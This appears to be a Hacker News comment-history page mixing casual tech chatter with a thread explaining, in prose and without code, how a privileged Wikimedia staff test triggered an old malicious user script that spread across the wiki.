Hacker Newsnew | past | comments | ask | show | jobs | submit | tux3's commentslogin

Of course, recurring payments work completely differently. A shockingly large fraction of recurring payments are from people who never got around to cancelling it. They're already getting what they want, any email just risks disturbing this situation.

I still get yearly email summary of my donations. They don't need to send more, and they could not send it if their objective is to stay under the radar

That could be true. I guess I could try giving a one-time donation from another account and see what happens.

You're absolutely right. That's not just a genius idea; it's a radical new paradigm.

I used to dual-boot windows, but I was too lazy to actually reboot, so naturally I had Virtualbox just boot the physical Windows partition while Linux was running. Which is totally fine!

It's not a real dual boot if you don't boot both partitions at the same time.

As long as you don't install guest VBox drivers, those would make it hang when it boots as the host on physical hardware, since there's no longer someone above to answer the hypercalls.


> I had Virtualbox just boot the physical Windows partition while Linux was running. Which is totally fine!

I had no idea that this was possible, and I learned something new today. Thank you!


I think Windows refused to do that at some point? So I booted the physical Linux partition from Windows if I needed both at the same time. That's on a laptop that otherwise almost always ran Linux.

It whines about licensing, but I switch between booting my windows installation bare metal and as a VM all the time

Yeah. That is a valid use. I mean, this is how I installed Windows to begin with, from Linux via QEMU, onto my other hard drive. I did reboot and test it out, and it worked just fine.

No, this is just what that writing style looks like. Names and acronyms are usually capitalized normally.

I keep being surprised by the magnitude of the disconnect between this place and the other circles of hell. I'd have thought the Venn diagram would have a lot more overlap.


Oh the venn diagram might be big, the HN population just has a lot of variance I think, and is less of a community per se. I don't doubt what you're saying, though in the grand scheme of things, I think the "too lazy to hit shift" population dwarfs any of these groups.

Yeah, I can agree with the variance. Except that the "too lazy to hit shift" community is not something I would ever confuse with people writing long form articles about their regex engine research that they'll be presenting at PLDI.

The confusion might be understandable for people who have never encountered this style before, but that's still a very uncharitable take about an otherwise pretty interesting article.


This does a terrible job explaining, but it seems to be in protest of age verification laws in operating systems.

The only commit is removing a user birthday field.


The existence of the user birthday field is mass surveillance, but the GECOS field, which contains your full name and street address, and the username, which often contains parts of your name and is mandatory, somehow are not. Full access to your home directory, which includes all of your passwords and usernames and confidential data, also somehow is not an invasion of privacy.

Correct, because putting additional data in GECOS is completely optional. This isn't about having your email client know your birthday, it's about phoning home to gate functionality. Verifiability, attestibility, all the loopholes that you think make this harmless are the croaks of a frog that is unjustifiably confident that the water in the pot won't continue getting hotter.

Putting your birthday in the birthday field is completely optional.

0.1 is of course a real number, but let A \in R the set of actual numbers... (/s)

The funny thing is, according to infinitists real numbers are not real. But I do like the concept of the set of actual numbers.

I don't know whether I'm an infinitist, but I personally think "real numbers" is the most ingenious marketing term created by mathematicians...

\infty is an actual number not in R

Should be \subset.

The goal isn't to improve the AI performance using the cheat sheet, it's to produce a cheat sheet at all that efficiently distills intuition about these 22 million results.

Presumably if it's written in plain text and useful to the AI, there may be some relevant information in there that will be interesting for humans too.


As I say, I understand the goal of having a cheat sheet that can distills a big chunk of math. But that distillation would have been better done by a neural network instead of the creation of a prompt (fine-tuning or pure distillation). But studying that neural network will be harder.

It's explicitly stated that the goal is to improve performance of cheap models but I assume, like you did, that they are hopping that the plain text may be useful to humans too.


Tao does state his hopes in the article: "My hope is that the winning submissions will capture the most productive techniques for solving these problems, and/or provide general problem-solving techniques that would also be applicable to other types of mathematical problems."

I think your suggestions are actually complementary. Distillation of the larger networks capable of solving these problems and study of the layers could be part of the process for generating the cheat sheet.


Wait, y'all are getting paid?


See the public phab ticket: https://phabricator.wikimedia.org/T419143

In short, a Wikimedia Foundation account was doing some sort of test which involved loading a large number of user scripts. They decided to just start loading random user scripts, instead of creating some just for this test.

The user who ran this test is a Staff Security Engineer at WMF, and naturally they decided to do this test under their highly-privileged Wikimedia Foundation staff account, which has permissions to edit the global CSS and JS that runs on every page.

One of those random scripts was a 2 year old malicious script from ruwiki. This script injects itself in the global Javascript on every page, and then in the userscripts of any user that runs into it, so it started spreading and doing damage really fast. This triggered tons of alerts, until the decision was made to turn the Wiki read-only.


This is a pretty egregious failure for a staff security engineer


It's a pretty egregious failure for the org because it controlled the conditions for it to happen.

The security guy is just the patsy because he actioned it.

They have obviously done this a million times before and now they got burned.


Yes, this. That same engineer shouldn’t have a pocket nuclear trigger shaped just like their key fob, either. Humans are predictable.


Aren’t staff part of engineering leadership?


At my job, I would just say they are in the ear of engineering leadership, but are not part of it.


That makes sense. I guess I usually think of developing policies for this kind of thing to be pretty much what staff would do. I don’t usually expect the CTO to make decisions about how to do testing. To the extent the engineering leadership are to blame, it’s that they were the ones who hired/retained this guy. The buck ultimately stops with them to be sure, but making these kinds of policies seems within the remit of a staff eng.


As a staff, you don't even imagine what his salary is for screwing up like that.

That being said, interesting to see how salaries skyrocketed over the years: https://meta.wikimedia.org/wiki/Wikimedia_Foundation_salarie... but not that much for engineering.


The highest non-severance number is $512,179 for the CEO in 2022. That's not particularly extreme. It's ~1/10 of what the Mozilla Foundation CEO makes.


that's insane...I am not donating anymore (not that I gave that much.)


With all their donation begging, nothing will change, they will still spend money on useless seminars and continue to underfund security by hiring low paid web amateurs to do the important work


Pretty much the definition of a “career limiting event”


It's either a a Career Limiting Event, or a Career Learning event.

In the case of a Learning event, you keep your job, and take the time to make the environment more resilient to this kind of issue.

In the case of a Limiting event, you lose your job, and get hired somewhere else for significantly better pay, and make the new environment more resilient to this kind of issue.

Hopefully the Wikimedia foundation is the former.


Realistically, there’s a third option which it would be glib to not consider: you lose your job, get hired somewhere else, and screw up in some novel and highly avoidable way because deep down you aren’t as diligent or detail-oriented as you think you are.


This is the most likely outcome


In the average real world, the staff engineer learns nothing, regardless of whether they get to lose or keep their job. Some time down the line, they make other careless mistakes. Eventually they retire, having learned nothing.

This is more common than you'd think.


I was able to run some stats at scale on this and people who make mistakes are more likely to make more mistakes, not less. Essentially sampling from a distribution of a propensity for mistakes and this dominated any sign of learning from mistakes. Someone who repeatedly makes mistakes is not repeatedly learning, they are accident prone.


My impression of mistakes was that they were an indicator of someone who was doing a lot of work. They're not necessarily making mistakes at a higher rate per unit of work, they just do more of both per unit of time.

From that perspective, it makes sense that the people who made the most mistakes in the past will also make the most mistakes in the future, but it's only because the people who did the most work in the past will do the most work in the future.

If you fire everyone who makes mistakes you'll be left only with the people who never make anything at all.


In this case it was trivial to normalize for work done.

It’s very human to want to be forgiving of mistakes, after all who has not made any mistakes, but there are different classes of mistakes made by all different types of people. If you make a mistake you are the same type of person, but if you are pulling from a distribution by sampling by those who have made mistakes you are biasing your sample in favor of those prone to making such mistakes. In my experience any effect of learning is much smaller than this initial bias.


Can you elaborate? What scale? What kind of mistakes? This sounds quite interesting.


A decade of data from many hundreds of people, help desk type roll where all communication was kept, mostly chat logs and emails. Machine learning with manual validation. The goal was to put a dollar figure on mistakes made since the customers were much more likely to quit and never come back if it was our fault, but also many customers are nothing but a constant pain in the ass so it was important to distinguish who was right whenever there was a conflict.

Mistakes made per call, like many things, were on a Pareto distribution, so 90% of the mistakes are made by 10% of the people. Identifying and firing those 10% made a huge difference. Some of the ‘mistakes’ were actually a result of corruption and they had management backing as management was enriching themselves at the cost of the company (a pretty common problem) so the initiative was killed after the first round.


This sounds really interesting but possibly qualitatively different than programming/engineering where automated improvements/iterations are part of the job (and what's rewarded)


What if you define a hard rule from this statistics that « you must fire anyone on error one »? Won’t your company be empty in a rather short timeframe? [or will be composed only of doingNothing people?]


Why would you do that? You’re sampling from a distribution, a single sample only carries a small amount of information, repeat samples compound though.


Or they are working in a very badly designed system which consistently encourages them to make mistakes


They'll be fine, recruiters don't look this stuff up and generally background checks only care about illegal shit.


Nobody is going to know who did this, so probably not career limiting in any major way.


They named him in the support ticket linked here somewhere.

> sbassett


[flagged]


Is ok, the AI was going to replace them in a few weeks anyway.


Didn't realise this was some historic evil script and not some active attacker who could change tack at any moment.

That makes the fix pretty easy. Write a regex to detect the evil script, and revert every page to a historic version without the script.


Letting ancient evil code run? Have we learned nothing from A Fire Upon the Deep?!


Link to the Prologue of Fire Upon the Deep: https://www.baen.com/Chapters/-0812515285/A_Fire_Upon_the_De...

It's very short and from one of my favorite books. Increasingly relevant.


I swear, I respect Vinge more and more based on how well he seems to understand human tendencies to plot some plausible trajectories for our civilization.


There's a little throwaway thing in the book (or maybe it was in the prequel) that I always liked, re understanding human tendencies. They're still using Unix time, starting in Jan 1st 1970, but given that their culture is so space-travel-focused they assume the early humans set it to coincide with man's first trip to the moon.


That's from the prequel, A Deepness in the Sky. (Which is also excellent.)


Deepness in the Sky is probably the first Sci Fi alien I read who didn't feel like a human wearing an alien suit.

Fantasy sometimes does this better but usually with specific tropes.


If you liked that and you haven't read it yet, give "Dragon's Egg" by Robert L. Forward a read.


I wish he could have seen the current state of GenAI. Several times in the book he talks about how the ship understands context clues and sarcasm, and that effective natural language translation requires near-sentience.


"It was really just humans playing with an old library. It should be safe, using their own automation, clean and benign.

This library wasn't a living creature, or even possessed of automation (which here might mean something more, far more, than human)."


\(^O^)/ zones of thought mentioned \(^O^)/


Do you remember the part where they built a machine in the Transcend that had to work at the Bottom of the Beyond?

The other day I was using Claude for a task, but it occurred to me, what if Claude is unreachable.

So, I told it to "encode your wisdom into this script in case you are not available"

That was my own version of that


Legitimately listening to this book for the first time after a coworker recommended it. It's rapidly becoming one of my favorite books that balances the truly alien with the familiar just right.

Not so ironically, it came up when we were discussing "software archeology".


Learning from fiction? Let's learn from the Dune then and start Butlerian jihad already.


I've only just heard of it. But, I already knew to not run random scripts under a privileged account. And thank you for the book suggestion - I'm into those kinds of tales.


I love that book


Army of Darkness?

The Mummy?


Are you sure? Are you $150 million ARR sure? Are you $150 million ARR, you'd really like to keep your job, you're not going to accidentally leave a hole or blow up something else, sure?

I agree, mostly, but I'm also really glad I don't have to put out this fire. Cheering them on from the sidelines, though!


Honestly, since I'm never really in a position to see much of that money, at this point I'd be more concerned about my coworkers. And while that typically correlates with the amount of money you either have or receive, they're often out of balance one way or the other.


True but it does say something that such a script was able to lie dormant for so long.


Why would anyone test in production???!!!


Selecting the wrong environment in your test setup by mistake?

I refuse to believe that someone on the security team intentionally tested random user scripts in production on purpose.


Once you get big enough… there comes a point where you need to run some code and learn what happens when 100 million people hitting it at once looks like. At that scale, “1 in a million class bugs/race conditions” literally happen every day. You can’t do that on every PR, so you ship it and prepare to roll back if anything even starts to look fishy. Maybe even just roll it out gradually.

At least, that’s how it worked at literally every big company I worked at so far. The only reason to hold it back is during testing/review. Once enough humans look at it, you release and watch metrics like a hawk.

And yeah, many features were released this way, often gated behind feature flags to control roll out. When I refactored our email system that sent over a billion notifications a month, it was nerve wracking. You can’t unsend an email and it would likely be hundreds of millions sent before we noticed a problem at scale.


Yes this is a common release practice.

However this is a different situation as we’re talking about running arbitrarily found third-party scripts. I can’t imagine that was ever intended to be done in production.

Fun story, when I worked at Facebook in the earlier days someone accidentally made a change that effectively set the release flags for every single feature to be live on production. That was a day… we had to completely wipe out memcached to stop the broken features and then the database was hammered to all hell.


I would say you can get to this point far below 100 million people, especially on web. Some people are truly special and have some kind of setup you just can't easily reproduce. But I agree, you do really have to be confident in your ability to control rollout / blast radius, monitor and revert if needed.


> I refuse to believe that someone on the security team intentionally tested random user scripts in production on purpose.

Do I have a bridge to sell you, oh boy


I have never heard of this kind of insane behaviour before.


There are plenty of ways to safely test in production. For one thing you need to limit the scope of your changes.


"Everyone has a test environment. Some are lucky enough to have a separate production environment."


Or just restore from backup across the board. Assuming they do their backups well this shouldn't be too hard (especially since its currently in Read Only mode which means no new updates)


> One of those random scripts was a 2 year old malicious script from ruwiki. This script injects itself in the global Javascript on every page, and then in the userscripts of any user that runs into it, so it started spreading and doing damage really fast.

So, like the Samy worm? (https://en.wikipedia.org/wiki/Samy_%28computer_worm%29)


I'm guessing, "1> Hey Claude, your script ran this malicious script!"

"Claude> Yes, you're absolutely right! I'm sorry!"


300 million dollar organization btw


aka tiny, relatively speaking, compared to similar sites with the same user base


wait as a wikipedia user you can just put random JS to some settings and it will just... run? privileged?

this is both really cool and really really insane


It's a mediawiki feature: there's a set of pages that get treated as JS/CSS and shown for either all users or specifically you. You do need to be an admin to edit the ones that get shown to all users.

https://www.mediawiki.org/wiki/Manual:Interface/JavaScript


Yes, you can have your own JS/CSS that’s injected in every page. This is pretty useful for widgets, editing tools, or to customize the website’s apparence.


It sounds very dangerous to me but who am I to judge.


It's nothing.

For the global ones that need admin permissions to edit, it's no different from all the other code of mediawiki itself like the php.

For the user scripts, it's no worse than the fact that you can run tampermonkey in your browser and have it modify every page from evry site in whatever way your want.


Well it has just been shown it's not nothing


No it hasn't.


That is how Mediawiki works. Everything is a page, including CSS and JS. It is not really different than including JS in a webpage anywhere else.


It is kind of risky - you now have an entire, mostly unreviewed, ecosystem of javascript code, that users can experiment with.

However its been really useful to allow power users to customize the interface to their needs. It also is sort of a pressure release for when official devs are too slow for meeting needs. At this point wikipedia has become very dependent on it.


It only affects your user; it’s just like adding random extensions to your browser.


Fundamentally I feel whole "web" as in anything running in browser is insane an broken security wise. When you allow mostly arbitrary code to run when you load a page... Well it can do mostly arbitrary things and everyone else needs to protect against it.

And when you have enough rights, you get to add arbitrary code to everywhere on your site.


On one hand, I was about to get irrationally angry someone was attacking Wikipedia, so I'm a bit relieved

On the other hand,

>a Staff Security Engineer at WMF, and naturally they decided to do this test under their highly-privileged Wikimedia Foundation staff account

seriously?


To paraphrase Bush,

> our enemies are innovative and resourceful, and so are we. They never stop thinking about new ways to harm our site and our users, and neither do we.


Why am I not surprised that the malicious script was from ruwiki?


>they decided to do this test under their

what language is this?


...wow.


this was us. we pumpin hard. we literall run, as in literally run the organisms of, senior wikimedia staff as well as employees

this is just us playing on the computer, we got b0mbz


No, sincerely calling things cringe is a millennial marker. Cringe was thrown around a lot in 2010's, but that was a decade and a half ago.

Nowadays you'll hear that cringe is cringe, let people enjoy things, be cringe and be free, etc etc


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: